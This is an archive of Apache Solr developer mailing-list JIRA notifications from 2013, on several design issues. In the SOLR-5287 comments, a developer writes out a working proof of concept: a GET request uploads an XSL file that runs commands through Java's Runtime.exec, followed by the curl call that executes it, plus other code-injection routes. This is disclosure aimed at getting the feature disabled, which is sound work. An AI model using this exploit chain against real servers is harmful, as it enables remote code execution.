> hadoop-0.20.1-core.jar, hadoop-core-0.20.2-cdh3u3.jar, hadoop.patch, 
> log4j-1.2.15.jar
>
>
> This patch contains  a contrib module that provides distributed indexing 
> (using Hadoop) to Solr EmbeddedSolrServer. The idea behind this module is 
> twofold:
> * provide an API that is familiar to Hadoop developers, i.e. that of 
> OutputFormat
> * avoid unnecessary export and (de)serialization of data maintained on HDFS. 
> SolrOutputFormat consumes data produced by reduce tasks directly, without 
> storing it in intermediate files. Furthermore, by using an 
> EmbeddedSolrServer, the indexing task is split into as many parts as there 
> are reducers, and the data to be indexed is not sent over the network.
> Design
> --
> Key/value pairs produced by reduce tasks are passed to SolrOutputFormat, 
> which in turn uses SolrRecordWriter to write this data. SolrRecordWriter 
> instantiates an EmbeddedSolrServer, and it also instantiates an 
> implementation of SolrDocumentConverter, which is responsible for turning 
> Hadoop (key, value) into a SolrInputDocument. This data is then added to a 
> batch, which is periodically submitted to EmbeddedSolrServer. When reduce 
> task completes, and the OutputFormat is closed, SolrRecordWriter calls 
> commit() and optimize() on the EmbeddedSolrServer.
> The API provides facilities to specify an arbitrary existing solr.home 
> directory, from which the conf/ and lib/ files will be taken.
> This process results in the creation of as many partial Solr home directories 
> as there were reduce tasks. The output shards are placed in the output 
> directory on the default filesystem (e.g. HDFS). Such part-N directories 
> can be used to run N shard servers. Additionally, users can specify the 
> number of reduce tasks, in particular 1 reduce task, in which case the output 
> will consist of a single shard.
> An example application is provided that processes large CSV files and uses 
> this API. It uses a custom CSV processing to avoid (de)serialization overhead.
> This patch relies on hadoop-core-0.19.1.jar - I attached the jar to this 
> issue, you should put it in contrib/hadoop/lib.
> Note: the development of this patch was sponsored by an anonymous contributor 
> and approved for release under Apache License.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Comment Edited] (SOLR-5287) Allow at least solrconfig.xml and schema.xml to be edited via the admin screen

2013-12-02 Thread Uwe Schindler (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5287?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836061#comment-13836061
 ] 

Uwe Schindler edited comment on SOLR-5287 at 12/2/13 5:46 PM:
--

Hi,
FYI I created a proof of concept why enabling this by default is bad:

First, after reading the [blog 
post|http://www.agarri.fr/kom/archives/2013/11/27/compromising_an_unreachable_solr_server_with_cve-2013-6397/index.html],
 you might think, you need to actually POST to the handler, which is not 
possible via XXE. But as Solr allows to pass a content stream through the URL 
query as string, your system is wide open for writing files, also when you can 
only do GET requests. Here is the example that uploads the file from the above 
blog post as {{xslt/test.xsl}}. This file has Java code embedded that starts 
{{calc.exe}} on windows systems:
{noformat}
> curl 
> 'http://localhost:8983/solr/collection1/admin/file?file=xslt/test.xsl&contentType=text/xml;charset=utf-8&op=write&stream.body=%3Cxsl%3Astylesheet%20version%3D%221.0%22%0A%20%20%20%20xmlns%3Axsl%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2FXSL%2FTransform%22%0A%20%20%20%20xmlns%3Art%3D%22http%3A%2F%2Fxml.apache.org%2Fxalan%2Fjava%2Fjava.lang.Runtime%22%3E%0A%0A%20%20%3Cxsl%3Aoutput%20method%3D%22text%22%2F%3E%0A%0A%20%20%3Cxsl%3Atemplate%20match%3D%22%2F%22%3E%0A%20%20%20%3Cxsl%3Avariable%20name%3D%22cmd%22%3E%3C!%5BCDATA%5Bcalc.exe%5D%5D%3E%3C%2Fxsl%3Avariable%3E%0A%20%20%20%3Cxsl%3Avariable%20name%3D%22rtObj%22%20select%3D%22rt%3AgetRuntime()%22%2F%3E%0A%20%20%20%3Cxsl%3Avariable%20name%3D%22process%22%20select%3D%22rt%3Aexec(%24rtObj%2C%20%24cmd)%22%2F%3E%0A%20%20%20%3Cxsl%3Atext%3EProcess%20started%3A%20%3C%2Fxsl%3Atext%3E%3Cxsl%3Avalue-of%20select%3D%22%24process%22%2F%3E%0A%20%20%3C%2Fxsl%3Atemplate%3E%0A%3C%2Fxsl%3Astylesheet%3E'
{noformat}

This is the file uploaded by this (on my windows system that open the windows 
calculator {{calc.exe}}, modify for linux or use other windows commands to 
format your harddisk):

{code:xml}
http://www.w3.org/1999/XSL/Transform";
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime";>

  

  
   
   
   
   Process started: 
  

{code}

If you want to edit the file and create the correctly encoded stream.body URL 
param, you can use this tool: http://meyerweb.com/eric/tools/dencoder/

If you then execute the newly created XSL file in your xslt config directory, 
the windows calculator opens on your desktop -- booom!:

{noformat}
> curl 'http://localhost:8983/solr/select/?q=*:*&wt=xslt&tr=test.xsl'
Process started: java.lang.ProcessImpl@73e71ddf
{noformat}

This is the reason, why this *must* be disabled by default. Having the 
possibility to upload arbitrary files containing active content to the solr 
server with only a GET () cannot be done by default. GET requests can be 
started by even smallest leaks in your firewall (as explained in the blog 
above).


was (Author: thetaphi):
Hi,
FYI I created a proof of concept why enabling this by default is bad:

First, after reading the blog post at http://www.agarri.fr/blog/, you might 
think, you need to actually POST to the handler, which is not possible via XXE. 
But as Solr allows to pass a content stream through the URL query as string, 
your system is wide open for writing files, also when you can only do GET 
requests. Here is the example that uploads the file from the above blog post as 
{{xslt/test.xsl}}. This file has Java code embedded that starts {{calc.exe}} on 
windows systems:
{noformat}
> curl 
> 'http://localhost:8983/solr/collection1/admin/file?file=xslt/test.xsl&contentType=text/xml;charset=utf-8&op=write&stream.body=%3Cxsl%3Astylesheet%20version%3D%221.0%22%0A%20%20%20%20xmlns%3Axsl%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2FXSL%2FTransform%22%0A%20%20%20%20xmlns%3Art%3D%22http%3A%2F%2Fxml.apache.org%2Fxalan%2Fjava%2Fjava.lang.Runtime%22%3E%0A%0A%20%20%3Cxsl%3Aoutput%20method%3D%22text%22%2F%3E%0A%0A%20%20%3Cxsl%3Atemplate%20match%3D%22%2F%22%3E%0A%20%20%20%3Cxsl%3Avariable%20name%3D%22cmd%22%3E%3C!%5BCDATA%5Bcalc.exe%5D%5D%3E%3C%2Fxsl%3Avariable%3E%0A%20%20%20%3Cxsl%3Avariable%20name%3D%22rtObj%22%20select%3D%22rt%3AgetRuntime()%22%2F%3E%0A%20%20%20%3Cxsl%3Avariable%20name%3D%22process%22%20select%3D%22rt%3Aexec(%24rtObj%2C%20%24cmd)%22%2F%3E%0A%20%20%20%3Cxsl%3Atext%3EProcess%20started%3A%20%3C%2Fxsl%3Atext%3E%3Cxsl%3Avalue-of%20select%3D%22%24process%22%2F%3E%0A%20%20%3C%2Fxsl%3Atemplate%3E%0A%3C%2Fxsl%3Astylesheet%3E'
{noformat}

This is the file uploaded by this (on my windows system that open the windows 
calculator {{calc.exe}}, modify for linux or use other windows commands to 
format your harddisk):

{code:xml}
http://www.w3.org/1999/XSL/Transform";
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime";>

  

  
   
   
   
   Process started: 
  

{code}

If you want to edit the file and create the correctly encoded str

[jira] [Comment Edited] (SOLR-5287) Allow at least solrconfig.xml and schema.xml to be edited via the admin screen

2013-12-02 Thread Uwe Schindler (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5287?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836068#comment-13836068
 ] 

Uwe Schindler edited comment on SOLR-5287 at 12/2/13 5:45 PM:
--

You can also upload a whole shell script to your config dir with a single GET 
request using stream.body and then execute this one with the above XSL. There 
are no limit, you can do whatever you like :-)

In addition the XSL hack used here is not the only possibility to use the new 
"solr file manager" to inject code:
- You can use the file manager to upload javascript files into the DIH folder 
and execute it later through DIH
- You can use the file manager to upload javascript files to the config dir and 
then use them in the UpdateRequestHandler through 
[ScriptUpdateProcessor|http://wiki.apache.org/solr/ScriptUpdateProcessor]. This 
is not enabled by default, but you can also upload a new solrconfig.xml through 
this handler and enable this, even with a GET request!!!

As Javascript (or any other scripting language) is running in Solr's JVM, you 
have access to the whole Solr API from the viewpoint of the Solr Update Request 
Handler / DIH.

The above PoC just shows the easiest way to use this hole.


was (Author: thetaphi):
You can also upload a whole shell script to your config dir with a single GET 
request using stream.body and then execute this one with the above XSL. There 
are no limit, you can do whatever you like :-)

> Allow at least solrconfig.xml and schema.xml to be edited via the admin screen
> --
>
> Key: SOLR-5287
> URL: https://issues.apache.org/jira/browse/SOLR-5287
> Project: Solr
>  Issue Type: Improvement
>  Components: Schema and Analysis, web gui
>Affects Versions: 4.5, 5.0
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Fix For: 5.0, 4.7
>
> Attachments: SOLR-5287.patch, SOLR-5287.patch, SOLR-5287.patch, 
> SOLR-5287.patch, SOLR-5287.patch
>
>
> A user asking a question on the Solr list got me to thinking about editing 
> the main config files from the Solr admin screen. I chatted briefly with 
> [~steffkes] about the mechanics of this on the browser side, he doesn't see a 
> problem on that end. His comment is there's no end point that'll write the 
> file back.
> Am I missing something here or is this actually not a hard problem? I see a 
> couple of issues off the bat, neither of which seem troublesome.
> 1> file permissions. I'd imagine lots of installations will get file 
> permission exceptions if Solr tries to write the file out. Well, do a 
> chmod/chown.
> 2> screwing up the system maliciously or not. I don't think this is an issue, 
> this would be part of the admin handler after all.
> Does anyone have objections to the idea? And how does this fit into the work 
> that [~sar...@syr.edu] has been doing?
> I can imagine this extending to SolrCloud with a "push this to ZK" option or 
> something like that, perhaps not in V1 unless it's easy.
> Of course any pointers gratefully received. Especially ones that start with 
> "Don't waste your effort, it'll never work (or be accepted)"...
> Because what scares me is this seems like such an easy thing to do that would 
> be a significant ease-of-use improvement, so there _has_ to be something I'm 
> missing.
> So if we go forward with this we'll make this the umbrella JIRA, the two 
> immediate sub-JIRAs that spring to mind will be the UI work and the endpoints 
> for the UI work to use.
> I think there are only two end-points here
> 1> list all the files in the conf (or arbitrary from /collection) 
> directory.
> 2> write this text to this file
> Possibly later we could add "clone the configs from coreX to coreY".
> BTW, I've assigned this to myself so I don't lose it, but if anyone wants to 
> take it over it won't hurt my feelings a bit



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5474) Have a new mode for SolrJ to not watch any ZKNode

2013-12-02 Thread Noble Paul (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5474?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836718#comment-13836718
 ] 

Noble Paul commented on SOLR-5474:
--

Before updating the cache it should check the version of "state" for that 
collection. if it finds that the version is actually not changed it should just 
continue talking to other nodes in the shard and not invalidate the cache

> Have a new mode for SolrJ to not watch any ZKNode
> -
>
> Key: SOLR-5474
> URL: https://issues.apache.org/jira/browse/SOLR-5474
> Project: Solr
>  Issue Type: Sub-task
>  Components: SolrCloud
>Reporter: Noble Paul
>
> In this mode SolrJ would not watch any ZK node
> It fetches the state  on demand and cache the most recently used n 
> collections in memory.
> SolrJ would not listen to any ZK node. When a request comes for a collection 
> ‘xcoll’
> it would first check if such a collection exists
> If yes it first looks up the details in the local cache for that collection
> If not found in cache , it fetches the node /collections/xcoll/state.json and 
> caches the information
> Any query/update will be sent with extra query param specifying the 
> collection name , shard name, Role (Leader/Replica), and range (example 
> \_target_=xcoll:shard1:L:8000-b332) . A node would throw an error 
> (INVALID_NODE) if it does not the serve the collection/shard/Role/range combo.
> If SolrJ gets INVALID_NODE error it would invalidate the cache and fetch 
> fresh state information for that collection (and caches it again)
> If there is a connection timeout, SolrJ assumes the node is down and re-fetch 
> the state for the collection and try again



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Comment Edited] (SOLR-5287) Allow at least solrconfig.xml and schema.xml to be edited via the admin screen

2013-12-02 Thread Uwe Schindler (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5287?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836696#comment-13836696
 ] 

Uwe Schindler edited comment on SOLR-5287 at 12/2/13 5:38 PM:
--

The commit in this issue is the problematic one. The other issues to be 
reverted are just "usage" of this new API in the admin interface. If we remove 
that feature from the 4.x branch, we have to remove the admin screens for it, 
too.

[~steve_rowe]'s answer was just for [~erickerickson] and me, because we wanted 
to confirm that the schema editing API does not have some "file manager" 
functionality, so you can inject code into solr's config or templates or 
whatever.


was (Author: thetaphi):
The commit in this issue is the problematic one. The other issues to be 
reverted are just "usage" of this new API in the admin interface. If we remove 
that feature from the 4.x branch, we have to remove the admin screens for it, 
too.

> Allow at least solrconfig.xml and schema.xml to be edited via the admin screen
> --
>
> Key: SOLR-5287
> URL: https://issues.apache.org/jira/browse/SOLR-5287
> Project: Solr
>  Issue Type: Improvement
>  Components: Schema and Analysis, web gui
>Affects Versions: 4.5, 5.0
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Fix For: 5.0, 4.7
>
> Attachments: SOLR-5287.patch, SOLR-5287.patch, SOLR-5287.patch, 
> SOLR-5287.patch, SOLR-5287.patch
>
>
> A user asking a question on the Solr list got me to thinking about editing 
> the main config files from the Solr admin screen. I chatted briefly with 
> [~steffkes] about the mechanics of this on the browser side, he doesn't see a 
> problem on that end. His comment is there's no end point that'll write the 
> file back.
> Am I missing something here or is this actually not a hard problem? I see a 
> couple of issues off the bat, neither of which seem troublesome.
> 1> file permissions. I'd imagine lots of installations will get file 
> permission exceptions if Solr tries to write the file out. Well, do a 
> chmod/chown.
> 2> screwing up the system maliciously or not. I don't think this is an issue, 
> this would be part of the admin handler after all.
> Does anyone have objections to the idea? And how does this fit into the work 
> that [~sar...@syr.edu] has been doing?
> I can imagine this extending to SolrCloud with a "push this to ZK" option or 
> something like that, perhaps not in V1 unless it's easy.
> Of course any pointers gratefully received. Especially ones that start with 
> "Don't waste your effort, it'll never work (or be accepted)"...
> Because what scares me is this seems like such an easy thing to do that would 
> be a significant ease-of-use improvement, so there _has_ to be something I'm 
> missing.
> So if we go forward with this we'll make this the umbrella JIRA, the two 
> immediate sub-JIRAs that spring to mind will be the UI work and the endpoints 
> for the UI work to use.
> I think there are only two end-points here
> 1> list all the files in the conf (or arbitrary from /collection) 
> directory.
> 2> write this text to this file
> Possibly later we could add "clone the configs from coreX to coreY".
> BTW, I've assigned this to myself so I don't lose it, but if anyone wants to 
> take it over it won't hurt my feelings a bit



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5518) Move editing config files into a new handler

2013-12-02 Thread Uwe Schindler (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5518?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836706#comment-13836706
 ] 

Uwe Schindler commented on SOLR-5518:
-

bq. I'm not sure if there's a need to remove the "Files" Page completely, since 
browsing the available files would be possible w/o the write-stuff anyway? 
maybe just removing the "modify" functionality but leave the rest "as is"?

I am fine with that! So we should revert SOLR-5287 in branch_4x, remove the 
"Modify /new File" button from admin UI, and all should be fine.

The current code should be committed to trunk only, and we open other issues to 
add "security" to the admin request handlers before providing them to users in 
a stable branch. This is all to half-baked, I don't want to risk Solr's good 
standing by merging this to a stable branch. A "file manager" in Solr is way 
too much for a stable branch, especially if it has no security at all.

> Move editing config files into a new handler
> 
>
> Key: SOLR-5518
> URL: https://issues.apache.org/jira/browse/SOLR-5518
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 5.0, 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Attachments: SOLR-5518.patch, SOLR-5518.patch
>
>
> See SOLR-5287. Uwe Schindler pointed out that writing files the way 5287 is a 
> security vulnerability and that disabling it should be the norm. Subsequent 
> discussion came up with this idea.
> Writing arbitrary config files should NOT be on by default.
> We'll also incorporate Mark's idea of testing XML files before writing 
> anywhere.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Updated] (SOLR-5473) Make one state.json per collection

2013-12-02 Thread Noble Paul (JIRA)


 [ 
https://issues.apache.org/jira/browse/SOLR-5473?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Noble Paul updated SOLR-5473:
-

Attachment: SOLR-5473.patch

> Make one state.json per collection
> --
>
> Key: SOLR-5473
> URL: https://issues.apache.org/jira/browse/SOLR-5473
> Project: Solr
>  Issue Type: Sub-task
>  Components: SolrCloud
>Reporter: Noble Paul
>Assignee: Noble Paul
> Attachments: SOLR-5473.patch, SOLR-5473.patch
>
>
> As defined in the parent issue, store the states of each collection under 
> /collections/collectionname/state.json node



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5287) Allow at least solrconfig.xml and schema.xml to be edited via the admin screen

2013-12-02 Thread Uwe Schindler (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5287?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836696#comment-13836696
 ] 

Uwe Schindler commented on SOLR-5287:
-

The commit in this issue is the problematic one. The other issues to be 
reverted are just "usage" of this new API in the admin interface. If we remove 
that feature from the 4.x branch, we have to remove the admin screens for it, 
too.

> Allow at least solrconfig.xml and schema.xml to be edited via the admin screen
> --
>
> Key: SOLR-5287
> URL: https://issues.apache.org/jira/browse/SOLR-5287
> Project: Solr
>  Issue Type: Improvement
>  Components: Schema and Analysis, web gui
>Affects Versions: 4.5, 5.0
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Fix For: 5.0, 4.7
>
> Attachments: SOLR-5287.patch, SOLR-5287.patch, SOLR-5287.patch, 
> SOLR-5287.patch, SOLR-5287.patch
>
>
> A user asking a question on the Solr list got me to thinking about editing 
> the main config files from the Solr admin screen. I chatted briefly with 
> [~steffkes] about the mechanics of this on the browser side, he doesn't see a 
> problem on that end. His comment is there's no end point that'll write the 
> file back.
> Am I missing something here or is this actually not a hard problem? I see a 
> couple of issues off the bat, neither of which seem troublesome.
> 1> file permissions. I'd imagine lots of installations will get file 
> permission exceptions if Solr tries to write the file out. Well, do a 
> chmod/chown.
> 2> screwing up the system maliciously or not. I don't think this is an issue, 
> this would be part of the admin handler after all.
> Does anyone have objections to the idea? And how does this fit into the work 
> that [~sar...@syr.edu] has been doing?
> I can imagine this extending to SolrCloud with a "push this to ZK" option or 
> something like that, perhaps not in V1 unless it's easy.
> Of course any pointers gratefully received. Especially ones that start with 
> "Don't waste your effort, it'll never work (or be accepted)"...
> Because what scares me is this seems like such an easy thing to do that would 
> be a significant ease-of-use improvement, so there _has_ to be something I'm 
> missing.
> So if we go forward with this we'll make this the umbrella JIRA, the two 
> immediate sub-JIRAs that spring to mind will be the UI work and the endpoints 
> for the UI work to use.
> I think there are only two end-points here
> 1> list all the files in the conf (or arbitrary from /collection) 
> directory.
> 2> write this text to this file
> Possibly later we could add "clone the configs from coreX to coreY".
> BTW, I've assigned this to myself so I don't lose it, but if anyone wants to 
> take it over it won't hurt my feelings a bit



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5477) Async execution of OverseerCollectionProcessor tasks

2013-12-02 Thread Anshum Gupta (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5477?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836658#comment-13836658
 ] 

Anshum Gupta commented on SOLR-5477:


Here's what I'd recommend. 

Have 3 queues in the first phase of implementation. One each for submitted, 
running, completed. The completed queue only keeps the top-X tasks (by recency 
of completion). The completion queue is important for people to figure out 
details about a completed task e.g. completion time, running time etc.

I've started working on it and would recommend that we have a ThreadPool for 
the running tasks. This can be capped at a config setting.

I am still debating about when to accept tasks (or perhaps accept everything 
and fail them when they run). Here's a sample case on that. Firing a Shard 
split for collection1/shard1 would lead to an inactive shard1. If we continue 
to accept tasks until this completes, we may accept actions that involve 
shard1. We may need to take a call on that.

For now, I am not looking at truly multi-threading my implementation (but 
certainly doing that before having this particular JIRA as resolved). Once I 
get to it, I'd perhaps still just run only one request per collection at a 
time, until we have a more complex decision making capability.

Once a task is submitted, the OverseerCollectionProcessor peeks and processes 
tasks which are in the submitted queue and moves them to in-process. We'll have 
to synchronize this task on the queue/collection.

Upon completion, again the task is moved from the in-progress queue to the 
completed queue.

Cleaning up of the completed queue could also be tricky and we may need a 
failed tasks queue or have a way to perhaps retain failed tasks in the 
completed queue longer.

> Async execution of OverseerCollectionProcessor tasks
> 
>
> Key: SOLR-5477
> URL: https://issues.apache.org/jira/browse/SOLR-5477
> Project: Solr
>  Issue Type: Sub-task
>  Components: SolrCloud
>Reporter: Noble Paul
>
> Typical collection admin commands are long running and it is very common to 
> have the requests get timed out.  It is more of a problem if the cluster is 
> very large.Add an option to run these commands asynchronously
> add an extra param async=true for all collection commands
> the task is written to ZK and the caller is returned a task id. 
> as separate collection admin command will be added to poll the status of the 
> task
> command=status&id=7657668909
> if id is not passed all running async tasks should be listed
> A separate queue is created to store in-process tasks . After the tasks are 
> completed the queue entry is removed. OverSeerColectionProcessor will perform 
> these tasks in multiple threads



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5474) Have a new mode for SolrJ to not watch any ZKNode

2013-12-02 Thread Timothy Potter (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5474?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836662#comment-13836662
 ] 

Timothy Potter commented on SOLR-5474:
--

Thanks for the info about changes to ZkStateReader for SOLR-5473. I'm trying to 
think about how to differentiate between downed nodes and slow queries using 
this approach.

Let's consider the scenario where there are two nodes serving a shard (A & B) 
and LazyCloudSolrServer sends a query request to node A. Imagine that node A is 
down, but the client application doesn't know that yet because its cached state 
is stale. The request will timeout after some configurable duration. After the 
timeout, LazyCloudSolrServer refreshes the cached state and realizes node A is 
down so it sends the request to node B and the query succeeds.

However, if node A is actually healthy and the cause of the timeout is a slow 
query, then the client should have waited longer. After refreshing the state 
from ZooKeeper (in response to the timeout), the client can realize that since 
A was healthy, the cause of the timeout was likely a slow query. So does client 
re-send the slow query? That seems like it could end up in a loop of timeout / 
resends. Does LazyCloudSolrServer keep track of how many attempts it's made for 
a given query ... just brainstorming here ... I know Solr supports the 
timeAllowed parameter for a query but that's optional.

I suppose this scenario is still possible even with the current approach of 
having watcher on the state znode on the client side. Although, I have to think 
that under the current approach, the probability of sending a request to a 
downed node goes down since state is refreshed in real-time. The zk version 
doesn't help here because if node A is down, the only thing the client can do 
is wait for the request to timeout.

> Have a new mode for SolrJ to not watch any ZKNode
> -
>
> Key: SOLR-5474
> URL: https://issues.apache.org/jira/browse/SOLR-5474
> Project: Solr
>  Issue Type: Sub-task
>  Components: SolrCloud
>Reporter: Noble Paul
>
> In this mode SolrJ would not watch any ZK node
> It fetches the state  on demand and cache the most recently used n 
> collections in memory.
> SolrJ would not listen to any ZK node. When a request comes for a collection 
> ‘xcoll’
> it would first check if such a collection exists
> If yes it first looks up the details in the local cache for that collection
> If not found in cache , it fetches the node /collections/xcoll/state.json and 
> caches the information
> Any query/update will be sent with extra query param specifying the 
> collection name , shard name, Role (Leader/Replica), and range (example 
> \_target_=xcoll:shard1:L:8000-b332) . A node would throw an error 
> (INVALID_NODE) if it does not the serve the collection/shard/Role/range combo.
> If SolrJ gets INVALID_NODE error it would invalidate the cache and fetch 
> fresh state information for that collection (and caches it again)
> If there is a connection timeout, SolrJ assumes the node is down and re-fetch 
> the state for the collection and try again



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5477) Async execution of OverseerCollectionProcessor tasks

2013-12-02 Thread Anshum Gupta (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5477?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836659#comment-13836659
 ] 

Anshum Gupta commented on SOLR-5477:


+1 for [~yriveiro]

> Async execution of OverseerCollectionProcessor tasks
> 
>
> Key: SOLR-5477
> URL: https://issues.apache.org/jira/browse/SOLR-5477
> Project: Solr
>  Issue Type: Sub-task
>  Components: SolrCloud
>Reporter: Noble Paul
>
> Typical collection admin commands are long running and it is very common to 
> have the requests get timed out.  It is more of a problem if the cluster is 
> very large.Add an option to run these commands asynchronously
> add an extra param async=true for all collection commands
> the task is written to ZK and the caller is returned a task id. 
> as separate collection admin command will be added to poll the status of the 
> task
> command=status&id=7657668909
> if id is not passed all running async tasks should be listed
> A separate queue is created to store in-process tasks . After the tasks are 
> completed the queue entry is removed. OverSeerColectionProcessor will perform 
> these tasks in multiple threads



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5287) Allow at least solrconfig.xml and schema.xml to be edited via the admin screen

2013-12-02 Thread Yonik Seeley (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5287?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836635#comment-13836635
 ] 

Yonik Seeley commented on SOLR-5287:


It feels like multiple issues are being mixed together here.
There is the high level feature of being able to edit solrconfig/schema from 
the admin screen, which I don't see any issues with.
It's the implementation of that feature in this issue that has exploits it 
should not have?

> Allow at least solrconfig.xml and schema.xml to be edited via the admin screen
> --
>
> Key: SOLR-5287
> URL: https://issues.apache.org/jira/browse/SOLR-5287
> Project: Solr
>  Issue Type: Improvement
>  Components: Schema and Analysis, web gui
>Affects Versions: 4.5, 5.0
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Fix For: 5.0, 4.7
>
> Attachments: SOLR-5287.patch, SOLR-5287.patch, SOLR-5287.patch, 
> SOLR-5287.patch, SOLR-5287.patch
>
>
> A user asking a question on the Solr list got me to thinking about editing 
> the main config files from the Solr admin screen. I chatted briefly with 
> [~steffkes] about the mechanics of this on the browser side, he doesn't see a 
> problem on that end. His comment is there's no end point that'll write the 
> file back.
> Am I missing something here or is this actually not a hard problem? I see a 
> couple of issues off the bat, neither of which seem troublesome.
> 1> file permissions. I'd imagine lots of installations will get file 
> permission exceptions if Solr tries to write the file out. Well, do a 
> chmod/chown.
> 2> screwing up the system maliciously or not. I don't think this is an issue, 
> this would be part of the admin handler after all.
> Does anyone have objections to the idea? And how does this fit into the work 
> that [~sar...@syr.edu] has been doing?
> I can imagine this extending to SolrCloud with a "push this to ZK" option or 
> something like that, perhaps not in V1 unless it's easy.
> Of course any pointers gratefully received. Especially ones that start with 
> "Don't waste your effort, it'll never work (or be accepted)"...
> Because what scares me is this seems like such an easy thing to do that would 
> be a significant ease-of-use improvement, so there _has_ to be something I'm 
> missing.
> So if we go forward with this we'll make this the umbrella JIRA, the two 
> immediate sub-JIRAs that spring to mind will be the UI work and the endpoints 
> for the UI work to use.
> I think there are only two end-points here
> 1> list all the files in the conf (or arbitrary from /collection) 
> directory.
> 2> write this text to this file
> Possibly later we could add "clone the configs from coreX to coreY".
> BTW, I've assigned this to myself so I don't lose it, but if anyone wants to 
> take it over it won't hurt my feelings a bit



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5500) Fix /admin/mbeans?wt=json output

2013-12-02 Thread Ramkumar Aiyengar (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5500?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836636#comment-13836636
 ] 

Ramkumar Aiyengar commented on SOLR-5500:
-

Okay cool, thought it might be worth patching at least for the trunk but will 
leave to your discretion..

> Fix /admin/mbeans?wt=json output
> 
>
> Key: SOLR-5500
> URL: https://issues.apache.org/jira/browse/SOLR-5500
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 4.3, 4.4, 4.5
>Reporter: Ramkumar Aiyengar
>Priority: Minor
> Attachments: SOLR-5500.patch
>
>
> The current {{solr-mbeans}} outputs a list of category / category values. 
> This is better represented as an object.
> {code}
>   ...
>   "solr-mbeans": [
> "CACHE",
> "queryResultCache" : {
>   "class": "org.apache.solr.search.LRUCache",
>   ...
> {code}
> Change this to:
> {code}
> ...
>   "solr-mbeans": {
> "CACHE": {
>   "queryResultCache": {
> "class": "org.apache.solr.search.LRUCache",
> ...
> {code}



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5488) Fix up test failures for Analytics Component

2013-12-02 Thread Erick Erickson (JIRA)


[ 
